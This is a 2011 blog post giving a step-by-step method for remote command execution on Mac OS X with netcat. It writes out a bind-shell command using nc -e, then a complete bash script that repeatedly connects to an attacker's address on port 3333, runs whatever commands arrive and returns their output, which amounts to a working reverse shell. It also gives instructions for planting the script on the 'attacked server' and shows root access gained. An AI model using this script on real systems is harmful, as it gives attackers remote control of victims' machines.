November 12, 2011

NC remote execution on Mac OS X

Background

Netcat is a built-in application in Mac OS X, i quote from the manual (run: man nc to get more info):
The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages onto standard error instead of sending them to standard output, as telnet(1) does with some.
If you downloaded netcat for windows\linux, you would see that the "-e" or "-c" flags are enabled. The meaning of this flags is that an attacker can execute commands in the system that runs the netcat with the flags above, e.g. The server executed nc -l -p [port_number] -e cmd.exe (or /bin/bash in linux), while the attacker need only to run nc [server_address] [port_number]. After connecting to the server, the attacker can run any system command in the remote server.

Issue
I was testing varios versions of netcat on my Mac OS X, none of them worked in the execution mode above. Part of you would say that Mac OS X is only a permutation of FreeBSD, however the bottom line is that it won't work.

Solution
In order to avoid the limitation of executing system commands, I developed the bash script, which reversing a connection from the attacked server to the attacking machine.
Please follow the steps below:
1. Open connection on attacker's machine. run:
nc -k -l 3333
The state should be as shown in the following screenshot:
2. Copy the source code to the file ncmac.sh on the server (I run nano ncmac.sh)
#! /bin/bash
echo 'Started NC remote execution for Mac OS X by NirV ' > ~/result
while :
do
cat ~/result | nc [attacker_ip] 3333
nc [attacker_ip] 3333 | head -n 1 | awk '{system($0); print $0}' > ~/result
done
Note: If you can't open nano because of attack limitations, another option is to "echo" the text above to file, e.g. echo "[paste above text]" > ncmac.sh
3. Run sh macsh.sh

Now the server opened a reverse connection to attacker's machine. The attacker is able to run any command, i.e. see that the result of whoami is root (instead nirv on attacker's machine):

NOTE: Sometimes the attacker needs to type the system command few times until the server responds.